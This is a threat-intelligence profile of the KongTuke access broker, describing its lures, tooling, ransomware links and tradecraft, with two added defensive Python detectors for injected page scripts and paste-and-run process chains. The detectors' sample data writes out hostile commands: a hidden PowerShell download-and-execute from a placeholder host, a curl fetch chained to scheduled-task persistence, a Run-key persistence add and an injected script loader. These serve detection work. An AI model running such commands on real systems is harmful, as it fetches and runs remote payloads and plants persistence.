KongTuke
KongTuke is a financially motivated initial access broker and traffic distribution system (TDS) active since at least 2024, also tracked as Woodgnat, 404 TDS, Chaya_002, LandUpdate808, and TAG-124. The reporting describes it as an access-broker service rather than a single malware family: it compromises legitimate websites, especially WordPress sites, injects external JavaScript, and uses fake CAPTCHA, ClickFix, CrashFix, and FileFix-style social engineering to trick users into executing obfuscated PowerShell or other commands that fetch second-stage payloads. More recently, it has also used external Microsoft Teams chats, impersonating IT or help-desk staff, to obtain persistent access to corporate networks within minutes.

KongTuke has been linked to financially motivated intrusions against organizations in sectors including insurance, education, IT, professional services, industrial, legal, and energy, and reporting also ties its infrastructure to healthcare and other critical infrastructure targeting through downstream ransomware customers. Its business model is to compromise corporate networks and sell access to other criminals, including ransomware operators. The reporting directly links KongTuke-associated access or infrastructure to Qilin, Interlock, Rhysida, Akira, 8Base, Black Basta, and AlphV/BlackCat.

The actor’s tooling and delivery ecosystem includes ModeloRAT, a Python RAT/backdoor attributed to the group; Mistic, also tracked as MLTBackdoor, which Symantec and Carbon Black linked to KongTuke with low confidence; XorBee RAT; MintsLoader; D3F@ck Loader; Emmenhtal; Remcos; AsyncRAT; and Interlock RAT. ModeloRAT has been observed in ClickFix and Microsoft Teams social-engineering campaigns, while Mistic has been delivered via multi-stage ClickFix chains and uses DLL sideloading, in-memory execution, and self-deletion. Reporting also notes use of WinPython, Node.js, finger.exe, a fake NexShield browser extension, and the encrypted GateKeeper .NET payload.
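The compromised-site web injects described above are the part of the chain a site owner can check for directly. The following is an added example, not KongTuke tooling, any vendor's detector, or code from this page: it parses a fetched page and lists every external script whose host is outside the site's own allowlist, plus inline snippets that build a script element at run time and point it at a remote host. The allowlist, the host names (all under the reserved `.invalid` TLD) and the sample page are constructed for the illustration, and the inline-loader pattern is a generic heuristic rather than an indicator from the reporting.

```python
"""Review a fetched page for script injections.

Added illustration (not KongTuke tooling or any vendor's detector) of the
check a site owner can run for a compromised-site web inject: every
<script src=...> that loads from a host outside the site's own allowlist,
plus inline snippets that build a <script> element at run time and point it
at a remote host, are listed for manual review. Hosts and the sample page
below are constructed placeholders."""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re


class _ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src=...>
        self.inline = []        # bodies of <script> blocks with no src
        self._buf = None        # accumulates the current inline body

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data as raw text.
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


# Generic web-inject heuristic: a runtime-built <script> whose .src is set in
# code. Legitimate tag managers do this too, hence "review", not "block".
_DYNAMIC_LOADER = re.compile(
    r"createElement\(\s*['\"]script['\"]\s*\).*?\.src\s*=", re.I | re.S)


def find_suspect_scripts(html, allowed_hosts):
    """Return (kind, host, detail) tuples for scripts worth a manual look.

    kind is "external" for a <script src> on a non-allowlisted host, or
    "inline-loader" for an inline block matching _DYNAMIC_LOADER.
    Relative src values (empty netloc) are treated as same-origin.
    """
    allowed = {h.lower() for h in allowed_hosts}
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        # urlparse handles absolute and protocol-relative (//host/...) URLs;
        # a relative path yields an empty netloc. Any port is dropped.
        host = urlparse(src).netloc.lower().split(":")[0]
        if host and host not in allowed:
            findings.append(("external", host, src))
    for body in collector.inline:
        if _DYNAMIC_LOADER.search(body):
            findings.append(("inline-loader", "", " ".join(body.split())[:120]))
    return findings


# Constructed sample: two legitimate scripts, one injected remote script and
# one injected inline loader. The .invalid TLD never resolves.
SAMPLE_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.example.com/theme/plugin.js"></script>
<script src="//static.injected-example.invalid/j.js?ver=1"></script>
<script>
var s=document.createElement('script');
s.src='https://stage.injected-example.invalid/x.js';
document.head.appendChild(s);
</script>
</head><body><p>Hello</p></body></html>"""

if __name__ == "__main__":
    for kind, host, detail in find_suspect_scripts(SAMPLE_PAGE, ["cdn.example.com"]):
        print(f"{kind:14} {host:36} {detail}")
```

Run against a copy of the live page rather than the files on disk: an inject may be added by a compromised plugin or theme at render time and will not appear in the stored templates. A clean site yields an empty list, which makes the check suitable for a scheduled job that alerts on any non-empty result.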
Observed tactics and techniques in the reporting include compromised-site web injects, SEO poisoning, TDS-based victim filtering and redirection, fake browser update and CAPTCHA lures, clipboard hijacking, paste-and-run execution, abuse of LOLBins such as PowerShell, curl, certutil, WMIC, net.exe, reg.exe, and finger.exe, DLL sideloading, in-memory payload execution, scheduled-task and Run-key persistence, anti-analysis checks, and victim profiling to distinguish standalone from domain-joined enterprise systems. Multiple reports describe KongTuke as operating broad, opportunistic campaigns and then assessing which footholds can be sold onward. The reporting also notes links between TAG-124/LandUpdate808 infrastructure and SocGholish, TA866/Asylum Ambuscade, and Interlock, but does not establish those as aliases or sub-groups of KongTuke.
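On the endpoint, the paste-and-run execution, LOLBin abuse and Run-key or scheduled-task persistence listed above all surface in process-creation telemetry. The following is an added example of triage logic for such events; it is not a rule from the reporting this page summarises and uses only generic heuristics. It assumes Sysmon-style events reduced to three fields (parent image, image, command line), treats an interpreter spawned directly by explorer.exe as the paste-and-run shape, and requires two independent signals before flagging so that an administrator launching a script from Win+R is not flagged on the parent shape alone. The events and hosts (under the reserved `.invalid` TLD) are constructed.

```python
"""Triage process-creation events for paste-and-run chains.

Added illustration of detection logic for the endpoint side of the tactics
listed above (ClickFix-style paste-and-run, LOLBin download cradles, Run-key
and scheduled-task persistence). Example code with generic heuristics, not
indicators or rules from the reporting on this page; events are constructed.
"""
import re

# Win+R and File Explorer launches appear as children of explorer.exe, so an
# interpreter spawned directly by explorer.exe is the paste-and-run shape.
PASTE_RUN_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# (name, pattern) pairs evaluated against the command line. Each hit counts
# one point; the parent/child shape above adds another.
HEURISTICS = [
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("encoded-cmd", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download-cradle", re.compile(
        r"\b(?:iex|invoke-expression|irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b",
        re.I)),
    ("lolbin-fetch", re.compile(
        r"\b(?:curl(?:\.exe)?|certutil(?:\.exe)?\s+.*-urlcache|finger(?:\.exe)?)\b", re.I)),
    ("run-key", re.compile(r"\breg(?:\.exe)?\s+add\s+.*\\CurrentVersion\\Run\b", re.I)),
    ("sched-task", re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.I)),
]


def score_event(event):
    """Return the list of heuristic names that fire for one event."""
    hits = [name for name, rx in HEURISTICS if rx.search(event["cmdline"])]
    if (event["image"].lower() in INTERPRETERS
            and event["parent"].lower() in PASTE_RUN_PARENTS):
        hits.insert(0, "paste-and-run-parent")
    return hits


def triage(events, threshold=2):
    """Return (index, hits) for events scoring at or above threshold."""
    flagged = []
    for i, event in enumerate(events):
        hits = score_event(event)
        if len(hits) >= threshold:
            flagged.append((i, hits))
    return flagged


# Constructed Sysmon-style events: parent image, image, command line.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm https://stage.example.invalid/c.txt)"'},
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd /c curl -s https://stage.example.invalid/a.dat -o %TEMP%\\a.dat "
                "&& schtasks /create /tn Upd /tr %TEMP%\\a.dat /sc onlogon"},
    {"parent": "services.exe", "image": "svchost.exe",
     "cmdline": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p"},
    # Admin running a script from Win+R: parent shape only, so not flagged.
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
                "/v Updater /t REG_SZ /d C:\\Users\\Public\\u.exe"},
]

if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['cmdline'][:60]}...  -> {', '.join(hits)}")
```

The Win+R history itself (the RunMRU key in the user hive) is a second source worth collecting alongside these events, since a pasted command that never launched still leaves a record there; the scoring above is deliberately coarse and is meant to route events to an analyst, not to block on its own.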
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Insurance
- Software & Services
- Commercial & Professional Services
- Academia & Research
Tradecraft
42 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
18 malware families attributed to this actor across reporting.
Observables
185 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news.
- Financially motivated initial access broker conducting intrusions to establish and maintain long-term covert access in victim networks, then selling that access to ransomware crews.
- Initial access broker conducting financially motivated opportunistic intrusions across multiple sectors, using ClickFix-style social engineering, compromised WordPress-based traffic distribution infrastructure, malicious browser extensions, Microsoft Teams lures, and stealthy custom backdoors/RATs to establish footholds and potentially sell access to ransomware affiliates.
- Financially motivated initial access broker compromising corporate networks and selling access to ransomware groups; linked to Mistic/MLTBackdoor activity and ModeloRAT, and associated with ClickFix infection chains.
- Initial access broker active since at least 2024, linked to the Mistic backdoor and ModeloRAT, compromising corporate networks and selling access to ransomware groups.